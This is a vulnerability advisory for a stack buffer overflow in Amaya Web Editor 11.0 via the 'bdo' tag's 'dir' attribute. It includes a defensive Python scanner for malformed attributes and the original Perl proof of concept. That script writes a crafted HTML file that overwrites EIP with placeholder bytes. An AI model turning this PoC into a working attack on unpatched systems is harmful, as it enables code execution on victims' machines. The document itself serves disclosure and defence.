Vendor: Amaya Web Editor
By: Mountassif Moad (Stack)
CVSS: 9.3 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Amaya Web Editor
Affected Version From: 11.0 and prior
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Amaya Web Editor <= 11.0 Remote Buffer Overflow P0c

Amaya Web Editor version 11.0 and prior is vulnerable to a remote buffer overflow. The vulnerability is caused by a boundary error when handling the 'dir' attribute of the 'bdo' tag. An attacker can exploit it with a specially crafted HTML file to cause a stack-based buffer overflow in the application, resulting in arbitrary code execution.

Mitigation:

Upgrade to the latest version of Amaya Web Editor
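
Where upgrading is delayed, HTML files can be screened before they are opened in the editor. The following is an added example, not part of the original advisory or the Amaya project: it flags `bdo` tags whose `dir` attribute is overlong or not one of the values HTML defines. The names `scan_html`, `BdoDirScanner` and the `MAX_DIR_LEN` threshold are assumptions, and the sample input is constructed.

```python
from html.parser import HTMLParser

VALID_DIR = {"ltr", "rtl"}  # the values HTML defines for <bdo dir>
MAX_DIR_LEN = 16            # assumed threshold; legitimate values are 3 characters


class BdoDirScanner(HTMLParser):
    """Collects <bdo> start tags whose dir attribute looks malformed."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names before calling us.
        if tag != "bdo":
            return
        for name, value in attrs:
            if name != "dir":
                continue
            raw = value or ""  # a bare `dir` attribute has value None
            line, _col = self.getpos()
            # Check the raw length first so whitespace padding cannot hide it.
            if len(raw) > MAX_DIR_LEN:
                self.findings.append((line, "oversized", len(raw)))
            elif raw.strip().lower() not in VALID_DIR:
                self.findings.append((line, "invalid", len(raw)))


def scan_html(text):
    """Return (line, reason, value_length) tuples for one HTML document."""
    scanner = BdoDirScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


# Constructed sample: one valid tag, one oversized value, one invalid value.
SAMPLE = (
    "<html>\n"
    '<p><bdo dir="rtl">ok</bdo></p>\n'
    '<bdo dir="' + "A" * 172 + '">x</bdo>\n'
    "<BDO DIR=sideways>y</BDO>\n"
    "</html>\n"
)

if __name__ == "__main__":
    for line, reason, length in scan_html(SAMPLE):
        print(f"line {line}: {reason} dir value ({length} chars)")
```
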

Exploit-DB raw data:

#!/usr/bin/perl -w
# Amaya Web Editor <= 11.0 Remote Buffer Overflow P0c
 
# By Mountassif Moad (Stack)
# Here D : http://www.w3.org/Amaya/Distribution/amaya-WinXP-11.0.exe
# EAX 00000001
# ECX 0F866A64
# EDX 0083AA64 amaya.0083AA64
# EBX 00000000
# ESP 0012D080
# EBP 00000006
# ESI 0B425D00
# EDI 0085AD9C ASCII "src"
# EIP 44444444

print "===================================================================== \n";
print "Author : Stack            \n";
print "===================================================================== \n";
my $code ="<html>"."\n".
         '<bdo dir="'."\n";
my $bof = "\x41" x 160;
my $bof2 = "\x43" x 8;
my $bof3 = "\x44" x 4;
my $coding ='">'."\n".
             "Heap</bdo>"."\n".
            "</html>";
my $file="St_.html";
my $exploit = $code.$bof.$bof2.$bof3.$coding;
# Open for writing (truncate) so that re-running does not append a second copy to the file
open(my $FILE, ">", $file) or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-29]